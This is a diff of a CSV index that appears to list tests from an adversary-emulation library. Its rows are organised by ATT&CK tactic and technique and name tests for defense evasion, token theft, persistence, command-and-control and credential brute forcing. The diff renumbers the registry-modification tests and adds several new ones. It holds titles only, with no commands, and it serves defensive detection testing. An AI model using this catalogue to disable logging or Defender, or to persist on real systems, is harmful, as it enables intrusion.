-defense-evasion,T1112,Modify Registry,14,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
-defense-evasion,T1112,Modify Registry,15,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
-defense-evasion,T1112,Modify Registry,16,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
-defense-evasion,T1112,Modify Registry,17,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
-defense-evasion,T1112,Modify Registry,18,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
-defense-evasion,T1112,Modify Registry,19,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
-defense-evasion,T1112,Modify Registry,20,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
-defense-evasion,T1112,Modify Registry,21,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
-defense-evasion,T1112,Modify Registry,22,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
-defense-evasion,T1112,Modify Registry,23,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
-defense-evasion,T1112,Modify Registry,24,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
-defense-evasion,T1112,Modify Registry,25,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
-defense-evasion,T1112,Modify Registry,26,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
-defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
-defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
-defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
-defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
-defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
-defense-evasion,T1112,Modify Registry,32,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
-defense-evasion,T1112,Modify Registry,33,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
-defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
-defense-evasion,T1112,Modify Registry,35,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
-defense-evasion,T1112,Modify Registry,36,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
-defense-evasion,T1112,Modify Registry,37,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
-defense-evasion,T1112,Modify Registry,38,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
-defense-evasion,T1112,Modify Registry,39,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
-defense-evasion,T1112,Modify Registry,40,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
-defense-evasion,T1112,Modify Registry,41,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
-defense-evasion,T1112,Modify Registry,42,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
-defense-evasion,T1112,Modify Registry,43,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
-defense-evasion,T1112,Modify Registry,44,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
-defense-evasion,T1112,Modify Registry,45,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
-defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
-defense-evasion,T1112,Modify Registry,47,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
-defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
-defense-evasion,T1112,Modify Registry,49,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
-defense-evasion,T1112,Modify Registry,50,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
-defense-evasion,T1112,Modify Registry,51,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
-defense-evasion,T1112,Modify Registry,52,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
-defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
-defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
-defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
-defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
-defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
-defense-evasion,T1112,Modify Registry,58,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
-defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
-defense-evasion,T1112,Modify Registry,60,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
-defense-evasion,T1112,Modify Registry,61,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
-defense-evasion,T1112,Modify Registry,62,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
-defense-evasion,T1112,Modify Registry,63,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
-defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
-defense-evasion,T1112,Modify Registry,65,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
-defense-evasion,T1112,Modify Registry,66,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
-defense-evasion,T1112,Modify Registry,67,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
-defense-evasion,T1112,Modify Registry,68,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
+defense-evasion,T1112,Modify Registry,4,Use Powershell to Modify registry to store logon credentials,68254a85-aa42-4312-a695-38b7276307f8,powershell
+defense-evasion,T1112,Modify Registry,5,Add domain to Trusted sites Zone,cf447677-5a4e-4937-a82c-e47d254afd57,powershell
+defense-evasion,T1112,Modify Registry,6,Javascript in registry,15f44ea9-4571-4837-be9e-802431a7bfae,powershell
+defense-evasion,T1112,Modify Registry,7,Change Powershell Execution Policy to Bypass,f3a6cceb-06c9-48e5-8df8-8867a6814245,powershell
+defense-evasion,T1112,Modify Registry,8,BlackByte Ransomware Registry Changes - CMD,4f4e2f9f-6209-4fcf-9b15-3b7455706f5b,command_prompt
+defense-evasion,T1112,Modify Registry,9,BlackByte Ransomware Registry Changes - Powershell,0b79c06f-c788-44a2-8630-d69051f1123d,powershell
+defense-evasion,T1112,Modify Registry,10,Disable Windows Registry Tool,ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8,command_prompt
+defense-evasion,T1112,Modify Registry,11,Disable Windows CMD application,d2561a6d-72bd-408c-b150-13efe1801c2a,powershell
+defense-evasion,T1112,Modify Registry,12,Disable Windows Task Manager application,af254e70-dd0e-4de6-9afe-a994d9ea8b62,command_prompt
+defense-evasion,T1112,Modify Registry,13,Disable Windows Notification Center,c0d6d67f-1f63-42cc-95c0-5fd6b20082ad,command_prompt
+defense-evasion,T1112,Modify Registry,14,Disable Windows Shutdown Button,6e0d1131-2d7e-4905-8ca5-d6172f05d03d,command_prompt
+defense-evasion,T1112,Modify Registry,15,Disable Windows LogOff Button,e246578a-c24d-46a7-9237-0213ff86fb0c,command_prompt
+defense-evasion,T1112,Modify Registry,16,Disable Windows Change Password Feature,d4a6da40-618f-454d-9a9e-26af552aaeb0,command_prompt
+defense-evasion,T1112,Modify Registry,17,Disable Windows Lock Workstation Feature,3dacb0d2-46ee-4c27-ac1b-f9886bf91a56,command_prompt
+defense-evasion,T1112,Modify Registry,18,Activate Windows NoDesktop Group Policy Feature,93386d41-525c-4a1b-8235-134a628dee17,command_prompt
+defense-evasion,T1112,Modify Registry,19,Activate Windows NoRun Group Policy Feature,d49ff3cc-8168-4123-b5b3-f057d9abbd55,command_prompt
+defense-evasion,T1112,Modify Registry,20,Activate Windows NoFind Group Policy Feature,ffbb407e-7f1d-4c95-b22e-548169db1fbd,command_prompt
+defense-evasion,T1112,Modify Registry,21,Activate Windows NoControlPanel Group Policy Feature,a450e469-ba54-4de1-9deb-9023a6111690,command_prompt
+defense-evasion,T1112,Modify Registry,22,Activate Windows NoFileMenu Group Policy Feature,5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4,command_prompt
+defense-evasion,T1112,Modify Registry,23,Activate Windows NoClose Group Policy Feature,12f50e15-dbc6-478b-a801-a746e8ba1723,command_prompt
+defense-evasion,T1112,Modify Registry,24,Activate Windows NoSetTaskbar Group Policy Feature,d29b7faf-7355-4036-9ed3-719bd17951ed,command_prompt
+defense-evasion,T1112,Modify Registry,25,Activate Windows NoTrayContextMenu Group Policy Feature,4d72d4b1-fa7b-4374-b423-0fe326da49d2,command_prompt
+defense-evasion,T1112,Modify Registry,26,Activate Windows NoPropertiesMyDocuments Group Policy Feature,20fc9daa-bd48-4325-9aff-81b967a84b1d,command_prompt
+defense-evasion,T1112,Modify Registry,27,Hide Windows Clock Group Policy Feature,8023db1e-ad06-4966-934b-b6a0ae52689e,command_prompt
+defense-evasion,T1112,Modify Registry,28,Windows HideSCAHealth Group Policy Feature,a4637291-40b1-4a96-8c82-b28f1d73e54e,command_prompt
+defense-evasion,T1112,Modify Registry,29,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt
+defense-evasion,T1112,Modify Registry,30,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt
+defense-evasion,T1112,Modify Registry,31,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt
+defense-evasion,T1112,Modify Registry,32,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt
+defense-evasion,T1112,Modify Registry,33,Windows Powershell Logging Disabled,95b25212-91a7-42ff-9613-124aca6845a8,command_prompt
+defense-evasion,T1112,Modify Registry,34,Windows Add Registry Value to Load Service in Safe Mode without Network,1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5,command_prompt
+defense-evasion,T1112,Modify Registry,35,Windows Add Registry Value to Load Service in Safe Mode with Network,c173c948-65e5-499c-afbe-433722ed5bd4,command_prompt
+defense-evasion,T1112,Modify Registry,36,Disable Windows Toast Notifications,003f466a-6010-4b15-803a-cbb478a314d7,command_prompt
+defense-evasion,T1112,Modify Registry,37,Disable Windows Security Center Notifications,45914594-8df6-4ea9-b3cc-7eb9321a807e,command_prompt
+defense-evasion,T1112,Modify Registry,38,Suppress Win Defender Notifications,c30dada3-7777-4590-b970-dc890b8cf113,command_prompt
+defense-evasion,T1112,Modify Registry,39,Allow RDP Remote Assistance Feature,86677d0e-0b5e-4a2b-b302-454175f9aa9e,command_prompt
+defense-evasion,T1112,Modify Registry,40,NetWire RAT Registry Key Creation,65704cd4-6e36-4b90-b6c1-dc29a82c8e56,command_prompt
+defense-evasion,T1112,Modify Registry,41,Ursnif Malware Registry Key Creation,c375558d-7c25-45e9-bd64-7b23a97c1db0,command_prompt
+defense-evasion,T1112,Modify Registry,42,Terminal Server Client Connection History Cleared,3448824b-3c35-4a9e-a8f5-f887f68bea21,command_prompt
+defense-evasion,T1112,Modify Registry,43,Disable Windows Error Reporting Settings,d2c9e41e-cd86-473d-980d-b6403562e3e1,command_prompt
+defense-evasion,T1112,Modify Registry,44,DisallowRun Execution Of Certain Applications,71db768a-5a9c-4047-b5e7-59e01f188e84,command_prompt
+defense-evasion,T1112,Modify Registry,45,Enabling Restricted Admin Mode via Command_Prompt,fe7974e5-5813-477b-a7bd-311d4f535e83,command_prompt
+defense-evasion,T1112,Modify Registry,46,Mimic Ransomware - Enable Multiple User Sessions,39f1f378-ba8a-42b3-96dc-2a6540cfc1e3,command_prompt
+defense-evasion,T1112,Modify Registry,47,Mimic Ransomware - Allow Multiple RDP Sessions per User,35727d9e-7a7f-4d0c-a259-dc3906d6e8b9,command_prompt
+defense-evasion,T1112,Modify Registry,48,Event Viewer Registry Modification - Redirection URL,6174be7f-5153-4afd-92c5-e0c3b7cdb5ae,command_prompt
+defense-evasion,T1112,Modify Registry,49,Event Viewer Registry Modification - Redirection Program,81483501-b8a5-4225-8b32-52128e2f69db,command_prompt
+defense-evasion,T1112,Modify Registry,50,Enabling Remote Desktop Protocol via Remote Registry,e3ad8e83-3089-49ff-817f-e52f8c948090,command_prompt
+defense-evasion,T1112,Modify Registry,51,Disable Win Defender Notification,12e03af7-79f9-4f95-af48-d3f12f28a260,command_prompt
+defense-evasion,T1112,Modify Registry,52,Disable Windows OS Auto Update,01b20ca8-c7a3-4d86-af59-059f15ed5474,command_prompt
+defense-evasion,T1112,Modify Registry,53,Disable Windows Auto Reboot for current logon user,396f997b-c5f8-4a96-bb2c-3c8795cf459d,command_prompt
+defense-evasion,T1112,Modify Registry,54,Windows Auto Update Option to Notify before download,335a6b15-b8d2-4a3f-a973-ad69aa2620d7,command_prompt
+defense-evasion,T1112,Modify Registry,55,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
+defense-evasion,T1112,Modify Registry,56,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
+defense-evasion,T1112,Modify Registry,57,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,58,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
+defense-evasion,T1112,Modify Registry,59,Modify Internet Zone Protocol Defaults in Current User Registry - cmd,c88ef166-50fa-40d5-a80c-e2b87d4180f7,command_prompt
+defense-evasion,T1112,Modify Registry,60,Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell,b1a4d687-ba52-4057-81ab-757c3dc0d3b5,powershell
+defense-evasion,T1112,Modify Registry,61,Activities To Disable Secondary Authentication Detected By Modified Registry Value.,c26fb85a-fa50-4fab-a64a-c51f5dc538d5,command_prompt
+defense-evasion,T1112,Modify Registry,62,Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.,ffeddced-bb9f-49c6-97f0-3d07a509bf94,command_prompt
+defense-evasion,T1112,Modify Registry,63,Scarab Ransomware Defense Evasion Activities,ca8ba39c-3c5a-459f-8e15-280aec65a910,command_prompt
+defense-evasion,T1112,Modify Registry,64,Disable Remote Desktop Anti-Alias Setting Through Registry,61d35188-f113-4334-8245-8c6556d43909,command_prompt
+defense-evasion,T1112,Modify Registry,65,Disable Remote Desktop Security Settings Through Registry,4b81bcfa-fb0a-45e9-90c2-e3efe5160140,command_prompt
+defense-evasion,T1112,Modify Registry,66,Disabling ShowUI Settings of Windows Error Reporting (WER),09147b61-40f6-4b2a-b6fb-9e73a3437c96,command_prompt
+defense-evasion,T1112,Modify Registry,67,Enable Proxy Settings,eb0ba433-63e5-4a8c-a9f0-27c4192e1336,command_prompt
+defense-evasion,T1112,Modify Registry,68,Set-Up Proxy Server,d88a3d3b-d016-4939-a745-03638aafd21b,command_prompt
+defense-evasion,T1112,Modify Registry,69,RDP Authentication Level Override,7e7b62e9-5f83-477d-8935-48600f38a3c6,command_prompt
 defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
 defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
@@ -260,7 +264,10 @@ defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,11,Disable Windows Command Line Auditing using reg.exe,1329d5ab-e10e-4e5e-93d1-4d907eb656e5,command_prompt
+defense-evasion,T1562.003,Impair Defenses: Impair Command History Logging,12,Disable Windows Command Line Auditing using Powershell Cmdlet,95f5c72f-6dfe-45f3-a8c1-d8faa07176fa,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
 defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
@@ -503,6 +510,7 @@ privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Th
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
+privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,5,Juicy Potato,f095e373-b936-4eb4-8d22-f47ccbfbe64a,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
 privilege-escalation,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,3,Windows MOFComp.exe Load MOF File,29786d7e-8916-4de6-9c55-be7b093b2706,powershell
@@ -613,6 +621,7 @@ execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
+execution,T1059,Command and Scripting Interpreter,1,AutoIt Script Execution,a9b93f17-31cb-435d-a462-5e838a2a6026,powershell
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
@@ -669,6 +678,7 @@ persistence,T1053.005,Scheduled Task/Job: Scheduled Task,9,PowerShell Modify A S
 persistence,T1053.005,Scheduled Task/Job: Scheduled Task,10,"Scheduled Task (""Ghost Task"") via Registry Key Manipulation",704333ca-cc12-4bcf-9916-101844881f54,command_prompt
 persistence,T1546.013,Event Triggered Execution: PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell
 persistence,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
+persistence,T1542.001,Pre-OS Boot: System Firmware,1,UEFI Persistence via Wpbbin.exe File Creation,b8a49f03-e3c4-40f2-b7bb-9e8f8fdddbf1,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell
 persistence,T1574.011,Hijack Execution Flow: Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt
 persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt
@@ -731,6 +741,7 @@ persistence,T1546.008,Event Triggered Execution: Accessibility Features,4,Atbrok
 persistence,T1136.002,Create Account: Domain Account,1,Create a new Windows domain admin user,fcec2963-9951-4173-9bfa-98d8b7834e62,command_prompt
 persistence,T1136.002,Create Account: Domain Account,2,Create a new account similar to ANONYMOUS LOGON,dc7726d2-8ccb-4cc6-af22-0d5afb53a548,command_prompt
 persistence,T1136.002,Create Account: Domain Account,3,Create a new Domain Account using PowerShell,5a3497a4-1568-4663-b12a-d4a5ed70c7d7,powershell
+persistence,T1137.001,Office Application Startup: Office Template Macros.,1,Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell,940db09e-80b6-4dd0-8d4d-7764f89b47a8,powershell
 persistence,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,1,Persistence via WMI Event Subscription - CommandLineEventConsumer,3c64f177-28e2-49eb-a799-d767b24dd1e0,powershell
 persistence,T1546.003,Event Triggered Execution: Windows Management Instrumentation Event Subscription,2,Persistence via WMI Event Subscription - ActiveScriptEventConsumer,fecd0dfd-fb55-45fa-a10b-6250272d0832,powershell
@@ -800,6 +811,7 @@ command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query
 command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
 command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
+command-and-control,T1071,Application Layer Protocol,1,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,powershell
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
@@ -811,6 +823,7 @@ command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ec
 command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
 command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
 command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
+command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
 command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
 command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
 command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
@@ -845,11 +858,14 @@ command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
+command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
+command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
 collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
+collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
 collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
 collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
 collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
@@ -901,6 +917,7 @@ credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8
 credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
 credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
 credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
